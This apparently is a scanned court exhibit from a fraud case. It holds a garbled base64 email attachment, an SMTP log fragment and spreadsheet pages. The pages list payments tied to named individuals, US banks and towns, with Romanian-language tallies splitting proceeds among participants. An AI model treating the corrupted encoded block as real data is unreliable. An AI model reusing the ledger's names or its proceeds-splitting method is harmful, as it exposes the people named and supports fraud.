AGAAAAATAAAAaAAAABYAAABwAAAADQAAAHgAAAMAAAAtwAAAAIAAADkBAAA
AwAAAA8nCwALAAAAAAAAAsAAAAAAAAACwAAAAAAAALAAAAAAAAAB4QAAAF
AAAABwAAAFNoZWV0VVOMQAHAAAAU2hlZXQQzAAcAAABTaGVlldDQABwAAAFNoZWV0
NQAHAAAAU2h1ZXQ2AAwQAAACAAAAHgAAAAsAAABXb3Jrc2h1ZXRzAAMAAAAF
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAABAAAAAgAAAAMAAAAEAAAABQAAAAYAAAAHAAAACAAAAAkAAAAK
AAAACwAAAAwAAAANAAAADgAAAA8AAAA8AAAAQAAAAEQAAABIAAAATAAAAFAAAABUA
AAAWAAAAFwAAABgAAAAZAAAAGgAAABsAAAAcAAAAHQAAAB4AAAAfAAAAIAAA
ACEAAAAiAAAAIwAAACQAAAAlAAAAJgAAACcAAAAoAAAAKQAAACoAAAArAAAA
LAAAAC0AAAAuAAAALwAAADAAAAAxAAAAMgAAADMAAAA0AAAANQAAADYAAAA3
AAAAOAAAADkAAAA6AAAAOwAAADwAAAA9AAAAPgAAAD8AAABAAAAAQQAAAEIA
AABDAAAARAAAAEUAAABGAAAARwAAAEgAAABJAAAASgAAAEsAAABMAAAATQAA
AE4AAABPAAAAUAAAAFEAAABSAAAAUwAAAFQAAABVAAAAVgAAAFcAAABYAAAA
WQAAAFoAAABbAAAA/v///10AAABeAAAAXwAAAGAAAABhAAAAYgAAAGMAAAAD+
////ZQAAAGYAAABnAAAAaAAAAGkAAABqAAAAawAAP7////9/////v//////
//////////////////////////////////////////////////////////
////////////////////////////////1IAbwBvAHQAIABFAG4AdAByAHkA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW
AAUB/////////8CAAAAIAgCAAAAADAAAAAAAARgAAAAAAAAAAAAAAAW
AAAAAAA/v///wAAAAAAVBvAHIAIAAwBiAG8AAbwBrAAAAAAAAAAAAAAA3
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAgH/////
//////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAzrYAAAAAAAFAFMAdQBtAG0AYQBByAHkASQBuAGYAbwByAG0AYQBBYG0AGkA
bwBuAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAACAQEAAADAAAAA////
/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFwAAAAEAAA////
AAAAAUARABvAGMAdQBtAGUAbgB0AFMAdQBtAGBwAGYAcgBtAGEAdABpAGBy
AG0AYQB0AGkAbwBuAAAAAAAAAAAAAAAAAA4AAIB/////////AAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAAAQAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAAAQAAAAAAA

------=====_137727425118467=_--

.
250 Requested mail action okay, completed: id=0LuxWx-1WCBed0E2j-0108DQ
QUIT
221 gmx.com Service closing transmission channel

| | | | | | | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| | | 12,493.00 | | | | | | | | | ### | | | | | | |
| 8% | | 999.44 | | | | 6% | | | | 6% | 478 | | | | | | |
| ramas | | 11,493.56 | | | ramas | | | | ramas | ### | | | | | | | |
| | | 2,440.00 | #REF! | | | #REF! | #REF! | | | ### | 45.77 | ### | | | | | |
| | | 2,440.00 | #REF! | | | #REF! | #REF! | | | ### | 45.79 | ### | | | | | |
| | | 2,930.00 | #REFI | | | #REF! | #REF! | | | ### | 45.79 | ### | | | | | |
| | | 1,712.00 | #REFI | | | | | | | | | | | | | | |
| | | 1,712.00 | #REFI | | | | #REF! | | | | | ### | | | | | |
| | | #REFI | #REFI | | | | | | | ### | 135 | | | | | | |
| | | | | | | | | | | ### | 125 | | | | | | |
| | | | | | | payed | to come | | | | | | | | | | |
| email | | 9,999.00 | Johnny Bravo | | Boston, MA | 28-Jun | 10-Jul | | | | | | | | | | |
| | | | | | | | | | | | | 38.66% *.8 | 13% *.8 | | | | |
| tle | | | Lauren McGowan | | | | 26-Jun | | | | | | | | | | |
| tol | | | David Johnson | | | | 24-Jun | | | | | | | | | | |
| tra | huk | 6,852.30 | Donna Wolfe | US Bank - 1 | Jefferson, ME | 17-Jun x2 | | tzsapa mateo | 1 | 16880 ron | 5860 ron | 1971 ron | | 13% | 3889.5 ron | 20% net | 442.8117 |
| ier | | 9,218.63 | David Johnson | United Bank - 2 | Port Charlotte, FL | 18-Jun | 2-Jul | tzsapa mateo | | | | | | | | | |
| jve | | 9,218.63 | Linda Bartrom | | Lisle, IL | 19-Jun | | plerdut | | | | | | | | | |
| aw | | 9,349.60 | Jenn Brownfield | | Abilene, TX | 21-Jun | | plerdut | | | | | | | | | |
| tic | | 9,100.00 | David Johnson | United Bank - 3 | Edgewater, MD | 24-Jun x2 | | tzsapa mateo | | | | | | | | | |
| ma | | 7,808.13 | Donna Wolfe | US Bank - 2 | Saint Charles, MO | 25-Jun x2 | | 2 | | 10580 ron | 3998 ron | | | 15% | 6612.5 ron | | 891.573 |
| ru.j | | 6,900.00 | Lauren McGowan | | Lincoln, NE | 26-Jun | 3-Jul | tzsapa mateo | | | | | | | | | |
| wa | | 9,168.25 | Jason Black | JPMorgan Chase - 1 | Laguna Woods, CA | 26-Jun x2 | | 2 | | 2390 usd | 892.5 usd | | | 15% | 1487.5 usd | | 686.5385 |
| tla | | 7,757.76 | Donald Dow | | Blythe, CA | 26-Jun | | plerdut | | | | | | | | | |
| tzsi | berts | 7,707.36 | Donna Wolfe | US Bank - 3 | Webster, MA | 27-Jun x2 | | 2 | | | | | | | | | |
| bm | id | 9,218.63 | Nadja Hoyer-Booth | East West Bank - 1 | Streamwood, IL | 28-Jun hold 7-Jul | | 3 | 113100 ron | 45240 ron | 16995 ron | | | 28275 ron | | 3912.36 |
| ow | | 8,780.60 | Jason Black | JPMorgan Chase - 2 | Abilene, TX | 28-Jun x2 | | 3 | 1610 eur | 604 eur | 226.5 eur | | | 377.5 eur | | 226.5 |
| hu | b | 6,951.75 | Jason Black | JPMorgan Chase - 3 | Prescott, AZ | 1-Jul x2 | | 3 | | | | | | | | | |
| cs: | | 9,520.88 | Nadja Hoyer-Booth | East West Bank - 1 | east hampton NY | 3-Jul x2 | | 3 | | | | | | | | | |
| iga | | 13,097.50 | Jason Black | JPMorgan Chase - 4 | Fort Worth, TX | 3-Jul x2 | | 3 | | | | | | | | | |
| da | | 14,698.75 | Nadja Hoyer-Booth | East West Bank - 2 | Ontario, CA | 5-Jul x2 | | plerdut | | | | | | | | | |
| tnt | | 7,558.25 | Quintin Sawyers | BB&T | Bad Bramstedt, Ger | 4-Jul am | | plerdut | | | | | | | | | |
| Lpt | ar | 7,052.50 | Shane Garrett | Woodforrest National - 1 | Dallas, TX | 5-Jul x2 | | 4 | | | 13708 ron | | | | | | 3093.933 |
| dpt | non | 7,858.60 | Donna Wolfe | Charter One - 1 | Webster, TX | 5-Jul x2 | | 3 | | | | | | | | | |
| iye | | 9,269.60 | Donna Wolfe | Charter One - 2 | Seal Beach, CA | 6-Jul | 17-Jul | 4 | | | 541.5 usd | | | | | | 416.5385 |
| tla | harcu | 7,254.00 | Donna Wolfe | Charter One - 3 | Blythe, CA | 6-Jul | 18-Jul | 4 | | | | | | | | | |
| bu; | | 5,541.25 | Cindy Mahoney | Huntington National | Reseda, CA | 8-Jul x2 | | plerdut | | | | | | | | | |
| ron | | 9,168.25 | Comerica LLC | Community Bank | Torrance, CA | 9-Jul | 19-Jul | plerdut | | | | | | | | | |
| do | td | 13,700.00 | Shane Garrett | Woodforrest National - 2 | San Dimas, CA | 11-Jul x3 | | 4+5 | | | | | | | | | |
| ira | berts | 7,150.00 | Jason Black | Bank of the West - 1 | Webster, MA | 11-Jul | | 4 | | | | | | | | | |
| aw | | 2,484.00 | Donna Wolfe | Charter One - 4 | Abilene, TX | 12-Jul | 18-Jul | 4 | | | | | | | | | |
| gld | | 15,112.50 | Jason Black | Bank of the West - 2 | Granite Bay, CA | 12-Jul x2 | | 4+5 | | | | | | | | | |
| jeff | | 9,400.00 | Jason Black | Bank of the West - 3 | Benwood, WV | 15-Jul x2 | | 5 | | | | | | | | | |
| chi | andi | 5,541.25 | Shane Garrett | Woodforrest National - 3 | Austin, TX | 16-Jul | | plerdut | | | | | | | | | |
| pill | | 9,309.75 | Jason Black | Bank of the West - 4 | Hudson, NC | 17-Jul x2 | | 5 | | | | | | | | | |
| tph | | 9,100.00 | Jason Black | US Bank | Philadelphia, PA | 22-Jul x2 7/31/2013 | | 6 form | | | 20945 ron | | | | | |
| brit | | 8,900.00 | Hardik Patel | US Bank | Mentone, CA | 24-Jul x2 8/1/2013 | | 6 form | | | | | | | | | |
| tla | | 2,918.75 | David Johnson | Wells Fargo | Blythe, CA | 25-Jul | 1-Aug | 6 | | | | | | | | | |
| lcw | | 6,649.50 | David Johnson | Wells Fargo | Henderson, TX | 31-Jul | 11-Aug x2 | 6 | | | | | | | | | |
| Vrit | | 7,050.00 | Hardik Patel | US Bank | Smithtown, NY | 1-Aug Int 15-Aug | | 6 form | | | | | | | | | |
| boi | | 9,050.00 | David Johnson | Wells Fargo | East Meadow, NY | 1-Aug | 13-Aug x2 6+7 | | form | | | | | | | | |
| ma | Dier | 5,893.68 | Donna Wolfe | PNC | Reno, NV | 2-Aug Int 15-Aug x2 | | 6 | | | | | | | | | |

Gov. Ex. 1741 Pg 23 of 34

| | | | | | | | | | | | | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| | | 6,548.75 | Hardik Patel | US Bank | North Las Vegas, N | 2-Aug | 11-Aug x2 | | 7 | | | | | | | | | | | | | | |
| | jph / Eli | 9,350.00 | Donna Wolfe | PNC | Bedford, NY | 5-Aug | 14-Aug | | 7 form | | | | | | | | | | | | | | |
| | rnett | 7,203.63 | David Johnson | Wells Fargo | Joliet, IL | 5-Aug | | | 7 | | | | | | | | | | | | | | |
| | | 8,500.00 | Donna K Wolfe | PNC | Austin, TX | 6-Aug | | plerdut | form ONLINE to ebay | | | | | | | | | | | | | | |
| | | 6,281.00 | Jason Black | Bank of America | Henderson, TX | 9-Aug | | plerdut | | | | | | | | | | | | | | | |
| | | 10,729.88 | Donna Wolfe | PNC | Tyler, TX | 9-Aug | 19-Aug | | | | | | | | | | | | | | | | |
| | 2e | 6,000.00 | Donna Wolfe | Key Bank | Renton, WA | 12-Aug | 19-Aug | | form | | | | | | | | | | | | | | |
| bassparmangaoccom | William Parrish | 12,500.00 | Donna Wolfe | Key Bank | New Orleans, LA | 19-Aug | 31-Aug | | form | | | | | | | | | | | | | | |

| | | lei cat au fost in total | | | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 39 | 1000 | 39,000.00 | | | | | | | | | | | | | | |
| 88 | 200 | 17600 | | 1510 | eur | 6704 | | | | | | | | | | |
| 618 | 100 | 61800 | | 0.475 | | 3200 | lei a luat mf | | | | | | | | | |
| 145 | 10 | 1450 | | | | 3184.4 | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
| 58600 | a luat mf | | | | | | | | | | | | | | | |
| 60,050.00 | ramasi | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
| | | lei cat am in fapt | | | | | | | | | | | | | | |
| 586 | 100 | 58600 | | | | | | | | | | | | | | |
| 1 | 50 | 50 | | | | | | | | | | | | | | |
| 137 | 10 | 1370 | | | | | | | | | | | | | | |
| | | | | | | TREBUIA | | | | curs euro | | IN FAPT | | | | |
| | | lei | euro | | | fara linx | | cu linx | | 4.448 | | 60020 | lei | | | |
| | | 113102.2 | 1510 | | | 48690.88 | lei | 62828.66 | lei | | | 1510 | eur | 6716.48 | | |
| mf | 0.25 | 28275.55 | 377.5 | | | 604 | eur | 792.75 | eur | 3526.152 | | | | | | |
| linx | 0.25 | 28275.55 | 377.5 | | | | | | | TOTAL | 66354.81 | | TOTAL | 66736.48 | | |
| min | 0.1 | 11310.22 | 151 | | | | | | | | | | | | 380 lei tre sa dau lu mf ca sa fie custodia linx |
| amy | 0.25 | 28275.55 | 377.5 | | | | | | | | | | | | | |
| raul | 0.15 | 16965.33 | 226.5 | | | | | | | | | | | | | |
| raul beem | | 3450 | | | | | | | | | | | | | | |
| natiune | | 3280 | | | | | | | | | | | | | | |
| curs euro schimb | | | | | | 13734.23 | lei | a luat mf din partea lu linx | | | | | | | | |
| 4.45 | amy | 6731.55618 | euro | | | 14844.66 | lei | trebuia sa ia | | | | | | | | |
| | linx "custod | 3554.52809 | euro | | | 1110.434 | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
| amy | 0.388 | 10970.9134 | 146.47 | 2465.374 | | | | | | | | | | | | |
| raul | 0.087 | 2459.97285 | 32.8425 | 552.8029 | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
| | | lei | usd | lei | usd | lei->eur (cu | usd->eur (XE) | | | USD | EUR | | | | | |
| | | 91795 | 3810 | | | | | | | | | 5500 | 4.439 | 24414.5 | | 21000 |
| mf | 0.25 | 22948.75 | 902.5 | 34996.84 | 1376.313 | | | | | | | 7800 | 4.444 | 34663.2 | | 4.444 |
| linx | 0.25 | 22948.75 | 902.5 | | | | | | | | | 4900 | 4.447 | 21790.3 | | 5040 |
| min | 0.1 | 9179.5 | 361 | 0 | | | | | | | | 2800 | 4.449 | 12457.2 | | 115 |
| amy | 0.25 | 22948.75 | 902.5 | 31852.87 | 1252.67 | 7167.519 | 821.95 | | | 2319.828 | 10962.57 | 10944.24 | 21000 | 4.444057 | 93325.2 | 98479 |
| raul | 0.15 | 13769.25 | 541.5 | 15765.79 | 620.0175 | 3547.612 | 821.95 | | | | 2725.662 | 2707.329 | | | | |
| raul beem | | | | 1000 | | 1620.018 | | | | 2687.174 | | | | | | |
| natiune | | 6818 | 397 | | | | | | | | | | | | | |
| mf+min+nat-5040 | | | | 45954.34 | 2134.313 | 10340.83 | 1,643.90 | 11,984.53 | | | 7,367.53 | 7349.195 | 18.33 | 81.47438 | | |
| 1107-3000+10$ | | | | -1893 | 10 | | | | | | | | | | | |
| | | | | 5040 | | | | | | | | | | | | |
| | | | | | | | | | 4617 | | | | | | | |
| custodie linx | | | | | | | | | | | | | | | | |
| mf | 0.525 | 12048.09375 | 473.8125 | | | XE mf | 1.304406 | 1643.9 | | | | | | | | |
| amy | 0.388 | 8904.115 | 350.17 | | | acum | 1.31396 | 1631.947 | | | | | | | | |
| raul | 0.087 | 1996.54125 | 78.5175 | | | | | 11.95344 | | | | | | | | |
| | | | | | usd | 2144.313 | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
| | | lei | usd | lei | usd | | lei | usd | eur | | | | | | | |
| | | 49419 | 4030 | | | | | | | schimbat | 4.401 | 10220 | 44978.22 | | lei ramasi | 7790.78 |
| mf | 0.25 | 12354.75 | 1007.5 | | | | | | | XE mf | 1.329 | | | | | |
| linx | 0.25 | 12354.75 | 1007.5 | | | | | | | | | | | | | |
| min | 0.1 | 4941.9 | 403 | | | | | | | | | | | | | |

| | | | | | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| amy | 0.2 | 9883.8 | 806 | 14677.44 | 1196.91 | | 2790.78 | | 3601.51 | | | | | | 2423.655 | |
| raul | 0.2 | 9883.8 | 806 | 14308.66 | 893.6525 | | | | 3923.655 | | | | | | | |
| raul beem | | 3350 | | | | | | | | | | | | | | |
| mf+min | | | | 23782.89 | 1939.438 | | 5000 | 4030 | 2694.835 | | | | | | 4194.835 | |
| TOTAL | | 52769 | 4030 | | | | | | | | | | | | | |
| custodie linx | | | | | | | | | | | | | | | | |
| mf | 0.525 | 6486.24375 | 528.9375 | | | | | | | | | | | | | |
| amy | 0.388 | 4793.643 | 390.91 | | | | | | | | | | | | | |
| raul | 0.087 | 1074.86325 | 87.6525 | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
| 100 de lei lipsa | | | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | | | |
| | | lei | usd | lei | usd | | lei | usd | eur | | | | | | | |
| | | 87386 | 2295 | | | | | | | | USDRON | 3.3284 | | | | |
| mf | 0.2335 | 20404.631 | 535.8825 | | | | | | | | EURRON | 4.41 | | | | |
| linx | 0.2335 | 20404.631 | 535.8825 | | | | | | | | | | | | | |
| min | 0.1 | 8799.6 | 229.5 | | | | | | | | | | | | | |
| amy | 0.233 | 20360.938 | 534.735 | | | | | | | | | | | | | |
| raul | 0.2 | 19416.2 | 459 | 20943.94 | | | | | | | | | | | | |
| natiune | | 2400 | | | | | | | | | | | | | | |
| mf+min+nat | | 29604.231 | | | | | | | | | | | | | | |
| TOTAL | | 89766 | 2295 | | | | | | | | | | | | | |

Gov. Ex. 1741 Pg 26 of 34

| | usd | ron | eur | usd | ron | eur | | | |
|---|---|---|---|---|---|---|---|---|---|
| 0.8 | 1660 | | | 1328 | 0 | 0 | | | |
| 0.8 | 1680 | | | 1344 | 0 | 0 | | | |
| 0.8 | | 5610 | | 0 | 4488 | 0 | | | |
| 1 | | 6550 | | 0 | 6550 | 0 | | | |
| 1 | 1960 | 20 | | 1960 | 20 | 0 | | | |
| 1 | | 6560 | | 0 | 6560 | 0 | | | |
| 0.8 | | 5512 | | 0 | 4409.6 | 0 | | | |
| 0.8 | | 5510 | | 0 | 4408 | 0 | | | |
| 0.8 | 1650 | 10 | | 1320 | 8 | 0 | | | |
| TOTAL | 6950 | 29772 | | 5952 | 26443.6 | | | | |
| | | | | | | | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 1 | | 6770 | | 0 | 6770 | 0 | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 1 | | 6680 | | 0 | 6680 | 0 | | | |
| 1 | | 6680 | | 0 | 6680 | 0 | | | |
| 1 | | 17 | 1510 | 0 | 17 | 1510 | | | |
| 1 | | 5280 | | 0 | 5280 | 0 | | | |
| 1 | | 5280 | | 0 | 5280 | 0 | | | |
| 1 | | 5280 | | 0 | 5280 | 0 | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 1 | | 6800 | | 0 | 6800 | 0 | | | |
| 0.8 | | 5517 | | 0 | 4413.6 | 0 | | | |
| 0.8 | | 5510 | | 0 | 4408 | 0 | | | |
| 0.8 | | 5377 | | 0 | 4301.6 | 0 | | | |
| 1 | | 4800 | | 0 | 4800 | 0 | | | |
| 1 | | 4792 | | 0 | 4792 | 0 | | | |
| TOTAL | 0 | 116383 | 1510 | 0 | 113102.2 | 1510 | | | |
| | | | | | | | | | |
| 0.8 | | 6700 | | 0 | 5360 | 0 | | | |
| 0.8 | 1987 | | | 1589.6 | 0 | 0 | | | |
| 0.8 | | 6700 | | 0 | 5360 | 0 | | | |
| 1 | | 4950 | | 0 | 4950 | 0 | | | |
| 1 | | 4950 | | 0 | 4950 | 0 | | | |
| 1 | | 4950 | | 0 | 4950 | 0 | | | |

Gov. Ex. 1741 Pg 27 of 34

| | | | | | | | | |
|---|---|---|---|---|---|---|---|---|
| 0.8 | | 5130 | | 0 | 4104 | 0 | | |
| 0.8 | | 5130 | | 0 | 4104 | 0 | | |
| 0.8 | | 5130 | | 0 | 4104 | 0 | | |
| 1 | | 5380 | | 0 | 5380 | 0 | | |
| 1 | | 5380 | | 0 | 5380 | 0 | | |
| 1 | | 5380 | | 0 | 5380 | 0 | | |
| 0.8 | | 5300 | | 0 | 4240 | 0 | | |
| 1 | | 6700 | | 0 | 6700 | 0 | | |
| 1 | | 6700 | | 0 | 6700 | 0 | | |
| 1 | | 6700 | | 0 | 6700 | 0 | | |
| 1 | 2020 | 33 | | 2020 | 33 | 0 | | |
| 1 | | 6700 | | 0 | 6700 | 0 | | |
| 1 | | 6700 | | 0 | 6700 | 0 | | |
| TOTAL | 4007 | 98613 | 0 | 3609.6 | 91795 | 0 | 397.4 | 6818 |
| | | | | | | | | |
| 1 | | 4713 | | 0 | 4713 | 0 | | |
| 1 | | 4713 | | 0 | 4713 | 0 | | |
| 1 | | 4713 | | 0 | 4713 | 0 | | |
| 1 | | 4175 | | 0 | 4175 | 0 | | |
| 1 | | 4175 | | 0 | 4175 | 0 | | |
| 1 | 2015 | | | 2015 | 0 | 0 | | |
